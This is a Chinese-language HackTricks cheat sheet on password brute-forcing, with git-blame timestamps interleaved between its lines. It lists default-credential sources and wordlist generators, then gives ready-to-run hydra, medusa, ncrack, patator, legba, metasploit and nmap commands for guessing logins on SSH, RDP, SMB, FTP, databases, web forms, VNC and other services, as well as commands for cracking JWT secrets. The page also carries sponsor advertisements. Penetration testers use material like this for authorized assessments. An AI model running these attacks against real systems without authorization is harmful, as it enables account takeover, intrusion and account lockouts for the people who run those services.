2024-07-18 22:08:20 +00:00
# Brute Force - CheatSheet
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-07-18 22:08:20 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 轻松构建和 **自动化工作流程** ,由世界上 **最先进** 的社区工具提供支持。\
今天获取访问权限:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2024-07-18 22:08:20 +00:00
{% hint style="success" %}
学习和实践 AWS 黑客技术:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
2024-09-15 15:23:44 +00:00
学习和实践 GCP 黑客技术:< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks 培训 GCP 红队专家 (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
< summary > 支持 HackTricks< / summary >
2023-12-30 12:15:15 +00:00
2024-07-18 22:08:20 +00:00
* 查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
2024-09-15 15:23:44 +00:00
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**Telegram 群组** ](https://t.me/peass ) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) GitHub 仓库提交 PR 分享黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:08:20 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-05-06 11:08:56 +00:00
## 默认凭据
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
**在谷歌上搜索**所使用技术的默认凭据,或 **尝试这些链接** :
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet** ](https://github.com/ihebski/DefaultCreds-cheat-sheet )
* [**http://www.phenoelit.org/dpl/dpl.html** ](http://www.phenoelit.org/dpl/dpl.html )
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm** ](http://www.vulnerabilityassessment.co.uk/passwordsC.htm )
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/** ](https://192-168-1-1ip.mobi/default-router-passwords-list/ )
* [**https://datarecovery.com/rd/default-passwords/** ](https://datarecovery.com/rd/default-passwords/ )
* [**https://bizuns.com/default-passwords-list** ](https://bizuns.com/default-passwords-list )
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv** ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://www.cirt.net/passwords** ](https://www.cirt.net/passwords )
2021-11-24 15:00:38 +00:00
* [**http://www.passwordsdatabase.com/** ](http://www.passwordsdatabase.com )
2022-04-05 22:24:52 +00:00
* [**https://many-passwords.github.io/** ](https://many-passwords.github.io )
2023-04-15 21:35:06 +00:00
* [**https://theinfocentric.com/** ](https://theinfocentric.com/ )
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
## **创建您自己的字典**
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
尽可能多地收集目标的信息并生成自定义字典。可能有帮助的工具:
2024-04-06 18:13:07 +00:00
2024-04-16 03:24:30 +00:00
### Crunch
2020-11-30 15:34:43 +00:00
```bash
2020-07-15 15:43:14 +00:00
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
```
2024-04-16 03:24:30 +00:00
### Cewl
2020-07-15 15:43:14 +00:00
```bash
cewl example.com -m 5 -w words.txt
```
2024-04-16 03:24:30 +00:00
### [CUPP](https://github.com/Mebus/cupp)
2020-11-03 11:04:12 +00:00
2024-07-18 22:08:20 +00:00
根据你对受害者的了解(姓名、日期等)生成密码。
2021-11-24 15:00:38 +00:00
```
2020-11-03 11:04:12 +00:00
python3 cupp.py -h
```
2024-04-16 03:24:30 +00:00
### [Wister](https://github.com/cycurity/wister)
2023-04-15 21:35:06 +00:00
2024-07-18 22:08:20 +00:00
一个单词列表生成工具,允许您提供一组单词,使您能够从给定的单词中制作多个变体,创建一个独特且理想的单词列表,以便针对特定目标使用。
2023-04-15 21:35:06 +00:00
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
2023-08-03 19:12:22 +00:00
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____ |__ __ | ____ | __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __ | | _ /
\ /\ / _| |_ ____ ) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
2023-04-15 21:35:06 +00:00
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
```
2024-04-16 03:24:30 +00:00
### [pydictor](https://github.com/LandGrey/pydictor)
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### 字典列表
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/danielmiessler/SecLists** ](https://github.com/danielmiessler/SecLists )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://github.com/kaonashi-passwords/Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi )
2023-04-15 21:35:06 +00:00
* [**https://github.com/google/fuzzing/tree/master/dictionaries** ](https://github.com/google/fuzzing/tree/master/dictionaries )
2021-05-31 09:39:02 +00:00
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm** ](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm )
2023-04-15 21:35:06 +00:00
* [**https://weakpass.com/wordlist/** ](https://weakpass.com/wordlist/ )
* [**https://wordlists.assetnote.io/** ](https://wordlists.assetnote.io/ )
* [**https://github.com/fssecur3/fuzzlists** ](https://github.com/fssecur3/fuzzlists )
* [**https://hashkiller.io/listmanager** ](https://hashkiller.io/listmanager )
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists** ](https://github.com/Karanxa/Bug-Bounty-Wordlists )
2020-07-15 15:43:14 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-07-18 22:08:20 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 轻松构建和 **自动化工作流程** ,由世界上 **最先进** 的社区工具提供支持。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2024-04-16 03:24:30 +00:00
## 服务
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
按服务名称字母顺序排列。
### AFP
2020-07-15 15:43:14 +00:00
```bash
nmap -p 548 --script afp-brute < IP >
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE < PATH_PASSWDS >
msf> set USER_FILE < PATH_USERS >
msf> run
```
2024-04-16 03:24:30 +00:00
### AJP
2020-07-15 15:43:14 +00:00
```bash
nmap --script ajp-brute -p 8009 < IP >
```
2024-07-18 22:08:20 +00:00
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM 和 Solace)
2023-12-26 21:49:09 +00:00
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
2024-07-18 22:08:20 +00:00
### 卡桑德拉
2020-07-15 15:43:14 +00:00
```bash
nmap --script cassandra-brute -p 9160 < IP >
2023-12-26 21:49:09 +00:00
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### CouchDB
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
2024-07-18 22:08:20 +00:00
### Docker 注册表
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
2020-07-17 23:59:16 +00:00
```
2024-04-16 03:24:30 +00:00
### Elasticsearch
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### FTP
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ftp
ncrack -p 21 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ftp
2023-12-26 21:49:09 +00:00
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### HTTP 通用暴力破解
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
### HTTP 基本认证
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2022-09-12 15:29:22 +00:00
# Use https-get mode for https
2020-07-15 15:43:14 +00:00
medusa -h < IP > -u < username > -P < passwords.txt > -M http -m DIR:/path/to/auth -T 10
2023-12-26 21:49:09 +00:00
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
2020-07-15 15:43:14 +00:00
```
2024-05-06 11:08:56 +00:00
### HTTP - NTLM
2023-12-26 21:49:09 +00:00
```bash
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
```
2024-05-06 11:08:56 +00:00
### HTTP - Post Form
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^& password=^PASS^& enter=Sign+in:Login name or password is incorrect" -V
2022-09-12 15:29:22 +00:00
# Use https-post-form mode for https
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
对于 http**s**,您必须将 "http-post-form" 更改为 "**https-post-form"**
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
### **HTTP - CMS --** (W)ordpress, (J)oomla 或 (D)rupal 或 (M)oodle
2020-07-15 15:43:14 +00:00
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
2023-12-26 21:49:09 +00:00
# Check also https://github.com/evilsocket/legba/wiki/HTTP
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### IMAP
2023-12-26 21:49:09 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f < IP > imap -V
nmap -sV --script imap-brute -p < PORT > < IP >
legba imap --username user --password data/passwords.txt --target localhost:993
```
2024-04-16 03:24:30 +00:00
### IRC
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p < PORT > < IP >
```
2024-04-16 03:24:30 +00:00
### ISCSI
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 < IP >
```
2024-04-16 03:24:30 +00:00
### JWT
2021-03-08 16:25:26 +00:00
```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt < JWT token >
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
2024-04-16 03:24:30 +00:00
### LDAP
2020-07-15 15:43:14 +00:00
```bash
nmap --script ldap-brute -p 389 < IP >
2023-12-26 21:49:09 +00:00
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords .txt --ldap-domain example.org --single-match
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### MQTT
2022-02-19 19:42:58 +00:00
```
ncrack mqtt://127.0.0.1 --user test – P /root/Desktop/pass.txt -v
2023-12-26 21:49:09 +00:00
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
2022-02-19 19:42:58 +00:00
```
2024-04-16 03:24:30 +00:00
### Mongo
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script mongodb-brute -n -p 27017 < IP >
use auxiliary/scanner/mongodb/mongodb_login
2023-12-26 21:49:09 +00:00
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### MSSQL
2024-09-15 15:23:44 +00:00
[MSSQLPwner ](https://github.com/ScorpionesLabs/MSSqlPwner )
```shell
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
```
2023-12-26 21:49:09 +00:00
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
```
2024-04-16 03:24:30 +00:00
### MySQL
2020-07-15 15:43:14 +00:00
```bash
2021-11-21 17:03:07 +00:00
# hydra
2020-07-15 15:43:14 +00:00
hydra -L usernames.txt -P pass.txt < IP > mysql
2021-11-21 17:03:07 +00:00
# msfconsole
2020-07-15 15:43:14 +00:00
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
2021-11-21 17:03:07 +00:00
# medusa
medusa -h < IP / Host > -u < username > -P < password_list > < -f | to stop medusa on first success attempt > -t < threads > -M mysql
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
```
2024-04-16 03:24:30 +00:00
### OracleSQL
2020-07-15 15:43:14 +00:00
```bash
patator oracle_login sid=< SID > host=< IP > user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORT 1521
msf> set SID < SID >
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORTS 1521
msf> set SID < SID >
2022-09-12 15:29:22 +00:00
#for some reason nmap fails sometimes when executing this script
2020-07-15 15:43:14 +00:00
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=< SID > < IP >
2023-12-26 21:49:09 +00:00
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
为了使用 **oracle\_login** 和 **patator** ,您需要 **安装** :
2020-07-15 15:43:14 +00:00
```bash
pip3 install cx_Oracle --upgrade
```
2024-07-18 22:08:20 +00:00
[离线 OracleSQL 哈希暴力破解 ](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force ) (**版本 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** 和 **11.2.0.3** ):
2020-07-15 15:43:14 +00:00
```bash
2023-08-03 19:12:22 +00:00
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
### POP
2020-07-15 15:43:14 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f < IP > pop3 -V
2023-12-26 21:49:09 +00:00
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
```
2024-04-16 03:24:30 +00:00
### PostgreSQL
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > postgres
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M postgres
ncrack – v – U /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > :5432
patator pgsql_login host=< IP > user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 < IP >
2023-12-26 21:49:09 +00:00
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### PPTP
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
您可以从 [https://http.kali.org/pool/main/t/thc-pptp-bruter/ ](https://http.kali.org/pool/main/t/thc-pptp-bruter/ ) 下载 `.deb` 包进行安装。
2020-07-15 15:43:14 +00:00
```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter – u < Username > < IP >
```
2024-04-16 03:24:30 +00:00
### RDP
2020-07-15 15:43:14 +00:00
```bash
ncrack -vv --user < User > -P pwds.txt rdp://< IP >
hydra -V -f -L < userslist > -P < passwlist > rdp://< IP >
2023-12-26 21:49:09 +00:00
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain < RDP_DOMAIN > ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Redis
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 < IP >
2021-08-27 00:14:28 +00:00
hydra – P /path/pass.txt redis://< IP > :< PORT > # 6379 is the default
2023-12-26 21:49:09 +00:00
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Rexec
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P < password_file > rexec://< Victim-IP > -v -V
```
2024-04-16 03:24:30 +00:00
### Rlogin
2023-12-26 21:49:09 +00:00
```bash
hydra -l < username > -P < password_file > rlogin://< Victim-IP > -v -V
```
2024-04-16 03:24:30 +00:00
### Rsh
2020-07-15 15:43:14 +00:00
```bash
hydra -L < Username_list > rsh://< Victim_IP > -v -V
```
2024-02-06 03:43:18 +00:00
[http://pentestmonkey.net/tools/misc/rsh-grind ](http://pentestmonkey.net/tools/misc/rsh-grind )
2024-04-16 03:24:30 +00:00
### Rsync
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 < IP >
```
2024-04-16 03:24:30 +00:00
### RTSP
2023-12-26 21:49:09 +00:00
```bash
hydra -l root -P passwords.txt < IP > rtsp
```
2024-04-16 03:24:30 +00:00
### SFTP
2023-12-26 21:49:09 +00:00
```bash
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
2024-04-16 03:24:30 +00:00
### SNMP
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute < target > [--script-args snmp-brute.communitiesdb=< wordlist > ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt < IP >
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
2024-04-16 03:24:30 +00:00
### SMB
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
2023-12-26 21:49:09 +00:00
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup < SMB_WORKGROUP > ] [--smb-share < SMB_SHARE > ]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### SMTP
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P /path/to/passwords.txt < IP > smtp -V
hydra -l < username > -P /path/to/passwords.txt -s 587 < IP > -S -v -V #Port 587 for SMTP with SSL
2023-12-26 21:49:09 +00:00
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism < mech > ]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### SOCKS
2021-05-13 16:02:48 +00:00
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 < IP >
2023-12-26 21:49:09 +00:00
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
```
2024-04-16 03:24:30 +00:00
### SQL Server
2023-12-26 21:49:09 +00:00
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > mssql
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts < host > #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
2021-05-13 16:02:48 +00:00
```
2024-04-16 03:24:30 +00:00
### SSH
2023-01-21 22:02:49 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ssh
ncrack -p 22 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ssh
patator ssh_login host=< ip > port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
2023-12-26 21:49:09 +00:00
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
2023-01-21 22:02:49 +00:00
```
2024-07-18 22:08:20 +00:00
#### 弱 SSH 密钥 / Debian 可预测的 PRNG
2023-09-24 14:35:53 +00:00
2024-07-18 22:08:20 +00:00
一些系统在生成加密材料时使用的随机种子存在已知缺陷。这可能导致密钥空间显著减少,可以使用工具如 [snowdroppe/ssh-keybrute ](https://github.com/snowdroppe/ssh-keybrute ) 进行暴力破解。也可以找到预生成的弱密钥集,如 [g0tmi1k/debian-ssh ](https://github.com/g0tmi1k/debian-ssh )。
2023-01-21 22:02:49 +00:00
2024-07-18 22:08:20 +00:00
### STOMP (ActiveMQ, RabbitMQ, HornetQ 和 OpenMQ)
2023-12-26 21:49:09 +00:00
2024-09-15 15:23:44 +00:00
STOMP 文本协议是一种广泛使用的消息传递协议,**允许与流行的消息队列服务无缝通信和交互**,如 RabbitMQ、ActiveMQ、HornetQ 和 OpenMQ。它提供了一种标准化和高效的方法来交换消息和执行各种消息操作。
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Telnet
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > telnet
ncrack -p 23 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M telnet
2023-12-26 21:49:09 +00:00
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
2020-07-15 15:43:14 +00:00
```
2024-05-06 11:08:56 +00:00
### VNC
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt -s < PORT > < IP > vnc
2021-05-13 22:59:50 +00:00
medusa -h < IP > – u root -P /root/Desktop/pass.txt – M vnc
2020-07-15 15:43:14 +00:00
ncrack -V --user root -P /root/Desktop/pass.txt < IP > :>POR>T
2022-10-02 23:08:05 +00:00
patator vnc_login host=< IP > password=FILE0 0=/root/Desktop/pass.txt – t 1 – x retry:fgep!='Authentication failure' --max-retries 0 – x quit:code=0
use auxiliary/scanner/vnc/vnc_login
2024-04-16 03:24:30 +00:00
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt < IP >
2023-12-26 21:49:09 +00:00
legba vnc --target localhost:5901 --password data/passwords.txt
2022-01-10 10:36:14 +00:00
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS < ip >
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Winrm
2020-09-20 21:41:33 +00:00
```bash
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
```
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-06 03:43:18 +00:00
\
2024-07-18 22:08:20 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 轻松构建和 **自动化工作流程** ,由世界上 **最先进** 的社区工具提供支持。\
2024-02-06 03:43:18 +00:00
立即获取访问权限:
